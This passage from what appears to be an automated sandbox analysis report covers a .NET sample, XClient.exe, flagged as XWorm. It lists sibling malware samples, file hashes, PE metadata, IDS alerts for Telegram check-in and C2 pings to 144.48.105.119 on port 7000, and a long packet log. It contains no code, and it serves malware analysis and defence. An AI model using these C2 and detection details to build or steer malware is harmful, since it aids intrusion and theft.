                                              • 149.154.167.220
                                              Technonomic.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                              • 149.154.167.220
                                              Proforma Invoice.exeGet hashmaliciousMassLogger RATBrowse
                                              • 149.154.167.220
                                              Azygoses125.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                              • 149.154.167.220
                                              tg.exeGet hashmaliciousBabadedaBrowse
                                              • 149.154.167.220
                                              tg.exeGet hashmaliciousBabadedaBrowse
                                              • 149.154.167.220
                                              setup.exeGet hashmaliciousBabadedaBrowse
                                              • 149.154.167.220

                                              ASNs

                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                              TELEGRAMRUBHgwhz3lGN.exeGet hashmaliciousVidarBrowse
                                              • 149.154.167.99
                                              Requested Documentation.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                              • 149.154.167.220
                                              Tool_Unlock_v1.2.exeGet hashmaliciousVidarBrowse
                                              • 149.154.167.99
                                              iviewers.dllGet hashmaliciousLummaCBrowse
                                              • 149.154.167.220
                                              Flasher.exeGet hashmaliciousLuca Stealer, Rusty StealerBrowse
                                              • 149.154.167.220
                                              JA7cOAGHym.exeGet hashmaliciousVidarBrowse
                                              • 149.154.167.99
                                              https://linkenbio.net/59125/247Get hashmaliciousUnknownBrowse
                                              • 149.154.167.99
                                              aD7D9fkpII.exeGet hashmaliciousVidarBrowse
                                              • 149.154.167.99
                                              installer.batGet hashmaliciousVidarBrowse
                                              • 149.154.167.99
                                              skript.batGet hashmaliciousVidarBrowse
                                              • 149.154.167.99
                                              DEDICATEDUSarm.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                              • 38.87.151.159
                                              TRC.arm7.elfGet hashmaliciousMiraiBrowse
                                              • 74.201.216.32
                                              meow.arm.elfGet hashmaliciousUnknownBrowse
                                              • 194.26.25.141
                                              meow.arm5.elfGet hashmaliciousUnknownBrowse
                                              • 194.26.25.7
                                              la.bot.arm-20241006-1050.elfGet hashmaliciousUnknownBrowse
                                              • 200.220.163.218
                                              2.exeGet hashmaliciousAsyncRATBrowse
                                              • 216.105.171.163
                                              dKMlbDZXP3.elfGet hashmaliciousMiraiBrowse
                                              • 216.52.183.163
                                              build.htaGet hashmaliciousQuasarBrowse
                                              • 64.42.179.59
                                              build.exeGet hashmaliciousQuasarBrowse
                                              • 64.42.179.59
                                              Replace.exeGet hashmaliciousUnknownBrowse
                                              • 74.201.73.52

                                              JA3 Fingerprints

                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                              3b5074b1b5d032e5620f69f9f700ff0ehoEtvOOrYH.exeGet hashmaliciousSmokeLoaderBrowse
                                              • 149.154.167.220
                                              web44.mp4.htaGet hashmaliciousLummaCBrowse
                                              • 149.154.167.220
                                              random.exeGet hashmaliciousLummaCBrowse
                                              • 149.154.167.220
                                              eXbhgU9.exeGet hashmaliciousLummaCBrowse
                                              • 149.154.167.220
                                              Supplier.batGet hashmaliciousUnknownBrowse
                                              • 149.154.167.220
                                              Supplier.batGet hashmaliciousLodaRAT, XRedBrowse
                                              • 149.154.167.220
                                              NEW-DRAWING-SHEET.batGet hashmaliciousUnknownBrowse
                                              • 149.154.167.220
                                              Requested Documentation.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                              • 149.154.167.220
                                              lumma.ps1Get hashmaliciousLummaCBrowse
                                              • 149.154.167.220

                                              Dropped Files

                                              No context

                                              Created / dropped Files

                                              No created / dropped files found

                                              Static File Info

                                              General

                                              File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                              Entropy (8bit):5.598050581972324
                                              TrID:
                                              • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                              • Win32 Executable (generic) a (10002005/4) 49.75%
                                              • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                              • Windows Screen Saver (13104/52) 0.07%
                                              • Generic Win/DOS Executable (2004/3) 0.01%
                                              File name:XClient.exe
                                              File size:40'960 bytes
                                              MD5:ca1b3f03551f41b8c83217c3af2b0d3c
                                              SHA1:7cebd14139aad3b194080a7210c78a6587de1de5
                                              SHA256:e62ef733237ababe82f6b2109c70159744994515bc941b8ed025de10bb8aa624
                                              SHA512:c2044ae1a0b76c02ac8952fd205cbcf3ff1a9dbb491af1e9a18d7b212bdedd7d22fda7e3ba8b081b1279ae7d6e8951c2008eb79c9227a0c5f6a98c209c9ac10b
                                              SSDEEP:768:I7tEWUj10f2kgAWMLxOc2O5Ft9jwO+hdFuk:aKjPIV2wFt9jwO+3Ek
                                              TLSH:A0034C04B7E14626DAEE6BF019F366060630E617DD17EB8E1CD499DA1B3BA80CD413E6
                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...o.rg................................. ........@.. ....................................@................................

                                              File Icon

                                              Icon Hash:90cececece8e8eb0

                                              Static PE Info

                                              General

                                              Entrypoint:0x40b50e
                                              Entrypoint Section:.text
                                              Digitally signed:false
                                              Imagebase:0x400000
                                              Subsystem:windows gui
                                              Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                              DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                              Time Stamp:0x6772CD6F [Mon Dec 30 16:42:23 2024 UTC]
                                              TLS Callbacks:
                                              CLR (.Net) Version:
                                              OS Version Major:4
                                              OS Version Minor:0
                                              File Version Major:4
                                              File Version Minor:0
                                              Subsystem Version Major:4
                                              Subsystem Version Minor:0
                                              Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                              Entrypoint Preview

                                              Instruction
                                              jmp dword ptr [00402000h]
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al

                                              Data Directories

                                              NameVirtual AddressVirtual Size Is in Section
                                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_IMPORT0xb4b80x53.text
                                              IMAGE_DIRECTORY_ENTRY_RESOURCE0xc0000x4d8.rsrc
                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                              IMAGE_DIRECTORY_ENTRY_BASERELOC0xe0000xc.reloc
                                              IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                              Sections

                                              NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                              .text0x20000x95140x96005764ca3132be3244f35079ef92569dc4False0.49747395833333335data5.719926020626053IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                              .rsrc0xc0000x4d80x6002472af5ddbb53779b7381f16b8b9407bFalse0.3756510416666667data3.7216503306685733IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                              .reloc0xe0000xc0x200e4691ef7dae40ff5e0b74653525043d4False0.044921875data0.08153941234324169IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                              Resources

                                              NameRVASizeTypeLanguageCountryZLIB Complexity
                                              RT_VERSION0xc0a00x244data0.4724137931034483
                                              RT_MANIFEST0xc2e80x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5469387755102041

                                              Imports

                                              DLLImport
                                              mscoree.dll_CorExeMain

                                              Network Behavior

                                              Suricata IDS Alerts

                                              TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                              2024-12-30T20:13:41.777567+01001810007Joe Security ANOMALY Telegram Send Message1192.168.2.1649702149.154.167.220443TCP
                                              2024-12-30T20:13:41.777567+01002853685ETPRO MALWARE Win32/XWorm Checkin via Telegram1192.168.2.1649702149.154.167.220443TCP
                                              2024-12-30T20:14:59.749315+01002855924ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound1192.168.2.1649733144.48.105.1197000TCP

                                              Network Port Distribution

                                              TCP Packets

                                              TimestampSource PortDest PortSource IPDest IP
                                              Dec 30, 2024 20:13:40.805891991 CET49702443192.168.2.16149.154.167.220
                                              Dec 30, 2024 20:13:40.805927992 CET44349702149.154.167.220192.168.2.16
                                              Dec 30, 2024 20:13:40.806025982 CET49702443192.168.2.16149.154.167.220
                                              Dec 30, 2024 20:13:40.820647001 CET49702443192.168.2.16149.154.167.220
                                              Dec 30, 2024 20:13:40.820688963 CET44349702149.154.167.220192.168.2.16
                                              Dec 30, 2024 20:13:41.532702923 CET44349702149.154.167.220192.168.2.16
                                              Dec 30, 2024 20:13:41.532816887 CET49702443192.168.2.16149.154.167.220
                                              Dec 30, 2024 20:13:41.537188053 CET49702443192.168.2.16149.154.167.220
                                              Dec 30, 2024 20:13:41.537219048 CET44349702149.154.167.220192.168.2.16
                                              Dec 30, 2024 20:13:41.537647009 CET44349702149.154.167.220192.168.2.16
                                              Dec 30, 2024 20:13:41.593182087 CET49702443192.168.2.16149.154.167.220
                                              Dec 30, 2024 20:13:41.595483065 CET49702443192.168.2.16149.154.167.220
                                              Dec 30, 2024 20:13:41.643332005 CET44349702149.154.167.220192.168.2.16
                                              Dec 30, 2024 20:13:41.777589083 CET44349702149.154.167.220192.168.2.16
                                              Dec 30, 2024 20:13:41.777645111 CET44349702149.154.167.220192.168.2.16
                                              Dec 30, 2024 20:13:41.777767897 CET49702443192.168.2.16149.154.167.220
                                              Dec 30, 2024 20:13:41.856561899 CET49702443192.168.2.16149.154.167.220
                                              Dec 30, 2024 20:13:42.002224922 CET497037000192.168.2.16144.48.105.119
                                              Dec 30, 2024 20:13:42.007117987 CET700049703144.48.105.119192.168.2.16
                                              Dec 30, 2024 20:13:42.007282972 CET497037000192.168.2.16144.48.105.119
                                              Dec 30, 2024 20:13:42.050957918 CET497037000192.168.2.16144.48.105.119
                                              Dec 30, 2024 20:13:42.055802107 CET700049703144.48.105.119192.168.2.16
                                              Dec 30, 2024 20:13:43.602611065 CET700049703144.48.105.119192.168.2.16
                                              Dec 30, 2024 20:13:43.602719069 CET497037000192.168.2.16144.48.105.119
                                              Dec 30, 2024 20:13:45.549318075 CET497037000192.168.2.16144.48.105.119
                                              Dec 30, 2024 20:13:45.551016092 CET497067000192.168.2.16144.48.105.119
                                              Dec 30, 2024 20:13:45.554155111 CET700049703144.48.105.119192.168.2.16
                                              Dec 30, 2024 20:13:45.555876970 CET700049706144.48.105.119192.168.2.16
                                              Dec 30, 2024 20:13:45.555967093 CET497067000192.168.2.16144.48.105.119
                                              Dec 30, 2024 20:13:45.572228909 CET497067000192.168.2.16144.48.105.119
                                              Dec 30, 2024 20:13:45.577008963 CET700049706144.48.105.119192.168.2.16
                                              Dec 30, 2024 20:13:47.104125977 CET700049706144.48.105.119192.168.2.16
                                              Dec 30, 2024 20:13:47.104212046 CET497067000192.168.2.16144.48.105.119
                                              Dec 30, 2024 20:13:49.395411968 CET497067000192.168.2.16144.48.105.119
                                              Dec 30, 2024 20:13:49.396564960 CET497117000192.168.2.16144.48.105.119
                                              Dec 30, 2024 20:13:49.400299072 CET700049706144.48.105.119192.168.2.16
                                              Dec 30, 2024 20:13:49.401405096 CET700049711144.48.105.119192.168.2.16
                                              Dec 30, 2024 20:13:49.401599884 CET497117000192.168.2.16144.48.105.119
                                              Dec 30, 2024 20:13:49.417012930 CET497117000192.168.2.16144.48.105.119
                                              Dec 30, 2024 20:13:49.421757936 CET700049711144.48.105.119192.168.2.16
                                              Dec 30, 2024 20:13:51.103070974 CET700049711144.48.105.119192.168.2.16
                                              Dec 30, 2024 20:13:51.103166103 CET497117000192.168.2.16144.48.105.119
                                              Dec 30, 2024 20:13:52.800225973 CET497127000192.168.2.16144.48.105.119
                                              Dec 30, 2024 20:13:52.800228119 CET497117000192.168.2.16144.48.105.119
                                              Dec 30, 2024 20:13:52.805123091 CET700049711144.48.105.119192.168.2.16
                                              Dec 30, 2024 20:13:52.805161953 CET700049712144.48.105.119192.168.2.16
                                              Dec 30, 2024 20:13:52.807154894 CET497127000192.168.2.16144.48.105.119
                                              Dec 30, 2024 20:13:52.823163033 CET497127000192.168.2.16144.48.105.119
                                              Dec 30, 2024 20:13:52.827982903 CET700049712144.48.105.119192.168.2.16
                                              Dec 30, 2024 20:13:54.368104935 CET700049712144.48.105.119192.168.2.16
                                              Dec 30, 2024 20:13:54.368208885 CET497127000192.168.2.16144.48.105.119
                                              Dec 30, 2024 20:13:56.956332922 CET497127000192.168.2.16144.48.105.119
                                              Dec 30, 2024 20:13:56.957577944 CET497137000192.168.2.16144.48.105.119
                                              Dec 30, 2024 20:13:56.961316109 CET700049712144.48.105.119192.168.2.16
                                              Dec 30, 2024 20:13:56.962450027 CET700049713144.48.105.119192.168.2.16
                                              Dec 30, 2024 20:13:56.962532043 CET497137000192.168.2.16144.48.105.119
                                              Dec 30, 2024 20:13:56.979473114 CET497137000192.168.2.16144.48.105.119
                                              Dec 30, 2024 20:13:56.984317064 CET700049713144.48.105.119192.168.2.16
                                              Dec 30, 2024 20:13:58.507014990 CET700049713144.48.105.119192.168.2.16
                                              Dec 30, 2024 20:13:58.507253885 CET497137000192.168.2.16144.48.105.119
                                              Dec 30, 2024 20:14:00.807307005 CET497137000192.168.2.16144.48.105.119
                                              Dec 30, 2024 20:14:00.808399916 CET497147000192.168.2.16144.48.105.119
                                              Dec 30, 2024 20:14:00.812304020 CET700049713144.48.105.119192.168.2.16
                                              Dec 30, 2024 20:14:00.813250065 CET700049714144.48.105.119192.168.2.16
                                              Dec 30, 2024 20:14:00.813349009 CET497147000192.168.2.16144.48.105.119
                                              Dec 30, 2024 20:14:00.828598976 CET497147000192.168.2.16144.48.105.119
                                              Dec 30, 2024 20:14:00.833549976 CET700049714144.48.105.119192.168.2.16
                                              Dec 30, 2024 20:14:02.352765083 CET700049714144.48.105.119192.168.2.16
                                              Dec 30, 2024 20:14:02.352843046 CET497147000192.168.2.16144.48.105.119
                                              Dec 30, 2024 20:14:03.957310915 CET497147000192.168.2.16144.48.105.119
                                              Dec 30, 2024 20:14:03.958199024 CET497157000192.168.2.16144.48.105.119
                                              Dec 30, 2024 20:14:03.962292910 CET700049714144.48.105.119192.168.2.16
                                              Dec 30, 2024 20:14:03.963156939 CET700049715144.48.105.119192.168.2.16
                                              Dec 30, 2024 20:14:03.963258982 CET497157000192.168.2.16144.48.105.119
                                              Dec 30, 2024 20:14:03.977523088 CET497157000192.168.2.16144.48.105.119
                                              Dec 30, 2024 20:14:03.982350111 CET700049715144.48.105.119192.168.2.16
                                              Dec 30, 2024 20:14:05.618236065 CET700049715144.48.105.119192.168.2.16
                                              Dec 30, 2024 20:14:05.618345022 CET497157000192.168.2.16144.48.105.119
                                              Dec 30, 2024 20:14:07.380345106 CET497157000192.168.2.16144.48.105.119
                                              Dec 30, 2024 20:14:07.381505966 CET497167000192.168.2.16144.48.105.119
                                              Dec 30, 2024 20:14:07.385282993 CET700049715144.48.105.119192.168.2.16
                                              Dec 30, 2024 20:14:07.386409044 CET700049716144.48.105.119192.168.2.16
                                              Dec 30, 2024 20:14:07.386504889 CET497167000192.168.2.16144.48.105.119
                                              Dec 30, 2024 20:14:07.402076960 CET497167000192.168.2.16144.48.105.119
                                              Dec 30, 2024 20:14:07.406990051 CET700049716144.48.105.119192.168.2.16
                                              Dec 30, 2024 20:14:08.931176901 CET700049716144.48.105.119192.168.2.16
                                              Dec 30, 2024 20:14:08.931334019 CET497167000192.168.2.16144.48.105.119
                                              Dec 30, 2024 20:14:11.215478897 CET497167000192.168.2.16144.48.105.119
                                              Dec 30, 2024 20:14:11.216619015 CET497177000192.168.2.16144.48.105.119
                                              Dec 30, 2024 20:14:11.220448971 CET700049716144.48.105.119192.168.2.16
                                              Dec 30, 2024 20:14:11.221532106 CET700049717144.48.105.119192.168.2.16
                                              Dec 30, 2024 20:14:11.221631050 CET497177000192.168.2.16144.48.105.119
                                              Dec 30, 2024 20:14:11.237302065 CET497177000192.168.2.16144.48.105.119
                                              Dec 30, 2024 20:14:11.242134094 CET700049717144.48.105.119192.168.2.16
                                              Dec 30, 2024 20:14:12.856436968 CET700049717144.48.105.119192.168.2.16
                                              Dec 30, 2024 20:14:12.856658936 CET497177000192.168.2.16144.48.105.119
                                              Dec 30, 2024 20:14:16.776381969 CET497177000192.168.2.16144.48.105.119
                                              Dec 30, 2024 20:14:16.777482033 CET497187000192.168.2.16144.48.105.119
                                              Dec 30, 2024 20:14:16.781394005 CET700049717144.48.105.119192.168.2.16
                                              Dec 30, 2024 20:14:16.782377005 CET700049718144.48.105.119192.168.2.16
                                              Dec 30, 2024 20:14:16.782468081 CET497187000192.168.2.16144.48.105.119
                                              Dec 30, 2024 20:14:16.799046040 CET497187000192.168.2.16144.48.105.119
                                              Dec 30, 2024 20:14:16.803841114 CET700049718144.48.105.119192.168.2.16
                                              Dec 30, 2024 20:14:18.341010094 CET700049718144.48.105.119192.168.2.16
                                              Dec 30, 2024 20:14:18.341170073 CET497187000192.168.2.16144.48.105.119
                                              Dec 30, 2024 20:14:20.434417009 CET497187000192.168.2.16144.48.105.119
                                              Dec 30, 2024 20:14:20.435575962 CET497197000192.168.2.16144.48.105.119
                                              Dec 30, 2024 20:14:20.439467907 CET700049718144.48.105.119192.168.2.16
                                              Dec 30, 2024 20:14:20.440432072 CET700049719144.48.105.119192.168.2.16
                                              Dec 30, 2024 20:14:20.440524101 CET497197000192.168.2.16144.48.105.119
                                              Dec 30, 2024 20:14:20.455895901 CET497197000192.168.2.16144.48.105.119
                                              Dec 30, 2024 20:14:20.460700035 CET700049719144.48.105.119192.168.2.16
                                              Dec 30, 2024 20:14:21.993482113 CET700049719144.48.105.119192.168.2.16
                                              Dec 30, 2024 20:14:21.993593931 CET497197000192.168.2.16144.48.105.119
                                              Dec 30, 2024 20:14:22.847409010 CET497197000192.168.2.16144.48.105.119
                                              Dec 30, 2024 20:14:22.848387003 CET497207000192.168.2.16144.48.105.119
                                              Dec 30, 2024 20:14:22.852339029 CET700049719144.48.105.119192.168.2.16
                                              Dec 30, 2024 20:14:22.853358984 CET700049720144.48.105.119192.168.2.16
                                              Dec 30, 2024 20:14:22.853456974 CET497207000192.168.2.16144.48.105.119
                                              Dec 30, 2024 20:14:22.868463993 CET497207000192.168.2.16144.48.105.119
                                              Dec 30, 2024 20:14:22.873266935 CET700049720144.48.105.119192.168.2.16
                                              Dec 30, 2024 20:14:24.417490005 CET700049720144.48.105.119192.168.2.16
                                              Dec 30, 2024 20:14:24.417706966 CET497207000192.168.2.16144.48.105.119
                                              Dec 30, 2024 20:14:26.276384115 CET497207000192.168.2.16144.48.105.119
                                              Dec 30, 2024 20:14:26.277167082 CET497227000192.168.2.16144.48.105.119
                                              Dec 30, 2024 20:14:26.281523943 CET700049720144.48.105.119192.168.2.16
                                              Dec 30, 2024 20:14:26.282035112 CET700049722144.48.105.119192.168.2.16
                                              Dec 30, 2024 20:14:26.282124043 CET497227000192.168.2.16144.48.105.119
                                              Dec 30, 2024 20:14:26.296772957 CET497227000192.168.2.16144.48.105.119
                                              Dec 30, 2024 20:14:26.301681995 CET700049722144.48.105.119192.168.2.16
                                              Dec 30, 2024 20:14:27.839638948 CET700049722144.48.105.119192.168.2.16
                                              Dec 30, 2024 20:14:27.839735031 CET497227000192.168.2.16144.48.105.119
                                              Dec 30, 2024 20:14:28.914414883 CET497227000192.168.2.16144.48.105.119
                                              Dec 30, 2024 20:14:28.915575027 CET497237000192.168.2.16144.48.105.119
                                              Dec 30, 2024 20:14:28.919363976 CET700049722144.48.105.119192.168.2.16
                                              Dec 30, 2024 20:14:28.920500994 CET700049723144.48.105.119192.168.2.16
                                              Dec 30, 2024 20:14:28.920594931 CET497237000192.168.2.16144.48.105.119
                                              Dec 30, 2024 20:14:28.935609102 CET497237000192.168.2.16144.48.105.119
                                              Dec 30, 2024 20:14:28.940433025 CET700049723144.48.105.119192.168.2.16
                                              Dec 30, 2024 20:14:30.479022980 CET700049723144.48.105.119192.168.2.16
                                              Dec 30, 2024 20:14:30.479135990 CET497237000192.168.2.16144.48.105.119
                                              Dec 30, 2024 20:14:31.135540962 CET497237000192.168.2.16144.48.105.119
                                              Dec 30, 2024 20:14:31.136390924 CET497247000192.168.2.16144.48.105.119
                                              Dec 30, 2024 20:14:31.141670942 CET700049723144.48.105.119192.168.2.16
                                              Dec 30, 2024 20:14:31.143775940 CET700049724144.48.105.119192.168.2.16
                                              Dec 30, 2024 20:14:31.143873930 CET497247000192.168.2.16144.48.105.119
                                              Dec 30, 2024 20:14:31.157807112 CET497247000192.168.2.16144.48.105.119
                                              Dec 30, 2024 20:14:31.162667990 CET700049724144.48.105.119192.168.2.16
                                              Dec 30, 2024 20:14:32.696366072 CET700049724144.48.105.119192.168.2.16
                                              Dec 30, 2024 20:14:32.696432114 CET497247000192.168.2.16144.48.105.119
                                              Dec 30, 2024 20:14:32.920411110 CET497247000192.168.2.16144.48.105.119
                                              Dec 30, 2024 20:14:32.921252966 CET497257000192.168.2.16144.48.105.119
                                              Dec 30, 2024 20:14:32.925323963 CET700049724144.48.105.119192.168.2.16
                                              Dec 30, 2024 20:14:32.926135063 CET700049725144.48.105.119192.168.2.16
                                              Dec 30, 2024 20:14:32.926230907 CET497257000192.168.2.16144.48.105.119
                                              Dec 30, 2024 20:14:32.940151930 CET497257000192.168.2.16144.48.105.119
                                              Dec 30, 2024 20:14:32.945009947 CET700049725144.48.105.119192.168.2.16
                                              Dec 30, 2024 20:14:34.511468887 CET700049725144.48.105.119192.168.2.16
                                              Dec 30, 2024 20:14:34.511548042 CET497257000192.168.2.16144.48.105.119
                                              Dec 30, 2024 20:14:35.093411922 CET497257000192.168.2.16144.48.105.119
                                              Dec 30, 2024 20:14:35.094355106 CET497267000192.168.2.16144.48.105.119
                                              Dec 30, 2024 20:14:35.098423958 CET700049725144.48.105.119192.168.2.16
                                              Dec 30, 2024 20:14:35.099220037 CET700049726144.48.105.119192.168.2.16
                                              Dec 30, 2024 20:14:35.099297047 CET497267000192.168.2.16144.48.105.119
                                              Dec 30, 2024 20:14:35.112306118 CET497267000192.168.2.16144.48.105.119
                                              Dec 30, 2024 20:14:35.117207050 CET700049726144.48.105.119192.168.2.16
                                              Dec 30, 2024 20:14:36.775485039 CET700049726144.48.105.119192.168.2.16
                                              Dec 30, 2024 20:14:36.775569916 CET497267000192.168.2.16144.48.105.119
                                              Dec 30, 2024 20:14:37.301428080 CET497267000192.168.2.16144.48.105.119
                                              Dec 30, 2024 20:14:37.302191973 CET497277000192.168.2.16144.48.105.119
                                              Dec 30, 2024 20:14:37.306344032 CET700049726144.48.105.119192.168.2.16
                                              Dec 30, 2024 20:14:37.307105064 CET700049727144.48.105.119192.168.2.16
                                              Dec 30, 2024 20:14:37.307188034 CET497277000192.168.2.16144.48.105.119
                                              Dec 30, 2024 20:14:37.321789980 CET497277000192.168.2.16144.48.105.119
                                              Dec 30, 2024 20:14:37.326611042 CET700049727144.48.105.119192.168.2.16
                                              Dec 30, 2024 20:14:38.858503103 CET700049727144.48.105.119192.168.2.16
                                              Dec 30, 2024 20:14:38.858580112 CET497277000192.168.2.16144.48.105.119
                                              Dec 30, 2024 20:14:39.474515915 CET497277000192.168.2.16144.48.105.119
                                              Dec 30, 2024 20:14:39.475229979 CET497287000192.168.2.16144.48.105.119
                                              Dec 30, 2024 20:14:39.479537010 CET700049727144.48.105.119192.168.2.16
                                              Dec 30, 2024 20:14:39.480074883 CET700049728144.48.105.119192.168.2.16
                                              Dec 30, 2024 20:14:39.480165958 CET497287000192.168.2.16144.48.105.119
                                              Dec 30, 2024 20:14:39.495151997 CET497287000192.168.2.16144.48.105.119
                                              Dec 30, 2024 20:14:39.500082970 CET700049728144.48.105.119192.168.2.16
                                              Dec 30, 2024 20:14:41.027615070 CET700049728144.48.105.119192.168.2.16
                                              Dec 30, 2024 20:14:41.027694941 CET497287000192.168.2.16144.48.105.119
                                              Dec 30, 2024 20:14:41.120405912 CET497287000192.168.2.16144.48.105.119
                                              Dec 30, 2024 20:14:41.121459007 CET497297000192.168.2.16144.48.105.119
                                              Dec 30, 2024 20:14:41.125233889 CET700049728144.48.105.119192.168.2.16
                                              Dec 30, 2024 20:14:41.126382113 CET700049729144.48.105.119192.168.2.16
                                              Dec 30, 2024 20:14:41.126462936 CET497297000192.168.2.16144.48.105.119
                                              Dec 30, 2024 20:14:41.139780045 CET497297000192.168.2.16144.48.105.119
                                              Dec 30, 2024 20:14:41.144637108 CET700049729144.48.105.119192.168.2.16
                                              Dec 30, 2024 20:14:42.665252924 CET700049729144.48.105.119192.168.2.16
                                              Dec 30, 2024 20:14:42.665429115 CET497297000192.168.2.16144.48.105.119
                                              Dec 30, 2024 20:14:42.686512947 CET497297000192.168.2.16144.48.105.119
                                              Dec 30, 2024 20:14:42.687299013 CET497307000192.168.2.16144.48.105.119
                                              Dec 30, 2024 20:14:42.691345930 CET700049729144.48.105.119192.168.2.16
                                              Dec 30, 2024 20:14:42.692167997 CET700049730144.48.105.119192.168.2.16
                                              Dec 30, 2024 20:14:42.692260027 CET497307000192.168.2.16144.48.105.119
                                              Dec 30, 2024 20:14:42.709459066 CET497307000192.168.2.16144.48.105.119
                                              Dec 30, 2024 20:14:42.714360952 CET700049730144.48.105.119192.168.2.16
                                              Dec 30, 2024 20:14:44.242203951 CET700049730144.48.105.119192.168.2.16
                                              Dec 30, 2024 20:14:44.242296934 CET497307000192.168.2.16144.48.105.119
                                              Dec 30, 2024 20:14:48.982522964 CET497307000192.168.2.16144.48.105.119
                                              Dec 30, 2024 20:14:48.984756947 CET497317000192.168.2.16144.48.105.119
                                              Dec 30, 2024 20:14:48.987730980 CET700049730144.48.105.119192.168.2.16
                                              Dec 30, 2024 20:14:48.989849091 CET700049731144.48.105.119192.168.2.16
                                              Dec 30, 2024 20:14:48.989923000 CET497317000192.168.2.16144.48.105.119
                                              Dec 30, 2024 20:14:49.006444931 CET497317000192.168.2.16144.48.105.119
                                              Dec 30, 2024 20:14:49.011411905 CET700049731144.48.105.119192.168.2.16
                                              Dec 30, 2024 20:14:49.051316023 CET497317000192.168.2.16144.48.105.119
